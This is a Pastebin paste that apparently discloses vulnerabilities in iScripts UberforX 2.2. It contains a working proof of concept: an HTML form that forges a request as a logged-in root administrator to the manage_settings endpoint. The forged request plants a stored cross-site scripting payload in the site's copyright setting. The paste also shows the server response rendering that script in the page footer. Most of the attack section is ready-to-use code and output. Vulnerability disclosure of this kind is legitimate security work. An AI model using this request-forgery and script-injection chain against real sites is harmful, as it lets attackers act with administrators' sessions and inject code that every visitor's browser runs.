SHARE
TWEET

CVE-2018-10136 & CVE-2018-10137

ManhNho Apr 16th, 2018 (edited) 587 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit title: iScripts UberforX 2.2 - CSRF & Stored XSS in Admin Panel
  2. # Date: 16/04/2018
  3. # Exploit Author: ManhNho
  4. # Vendor Homepage: https://www.iscripts.com
  5. # Software Link: https://www.iscripts.com/uberforx/
  6. # Demo Link: https://www.demo.iscripts.com/uberforx/demo/cms
  7. # Version: 2.2
  8. # CVE: Pending...
  9. # Tested on: Windows 10 / Kali Linux
  10. # Category: Webapps
  11.  
  12.  
  13. #1. Description
  14. -----------------------------------------------------
  15. iScripts UberforX 2.2 - CSRF & Stored XSS via "manage_settings" section in Admin Panel.
  16.  
  17. #2. PoC
  18. -----------------------------------------------------
  19. a) Send below crafted request to logged in user who is having Root Administrator level access
  20.  
  21. <html>
  22.   <!-- CSRF PoC - ManhNho -->
  23.   <body>
  24.   <script>history.pushState('', '', '/')</script>
  25.     <form action="https://www.demo.iscripts.com/uberforx/demo/cms?section=manage_settings&action=edit&id=2" method="POST">
  26.       <input type="hidden" name="id" value="2" />
  27.       <input type="hidden" name="cms&#95;set&#95;name" value="admin&#95;copyright" />
  28.       <input type="hidden" name="cms&#95;set&#95;value" value="&lt;script&gt;alert&#40;&apos;1&apos;&#41;&lt;&#47;script&gt;" />
  29.       <input type="hidden" name="submit" value="Save" />
  30.       <input type="submit" value="Submit request" />
  31.     </form>
  32.   </body>
  33. </html>
  34.  
  35. b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
  36. Website will popup alert '1'
  37.  
  38. Response:
  39.  
  40. HTTP/1.1 200 OK
  41. Date: Mon, 16 Apr 2018 07:44:55 GMT
  42. Server: Apache
  43. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  44. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  45. Pragma: no-cache
  46. Connection: close
  47. Content-Type: text/html
  48. Content-Length: 28359
  49. ...
  50. </div>
  51. <div class="footer row-fluid">
  52. <p class="muted"><small><script>alert('1')</script></small></p>
  53. </div>
  54. ...
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top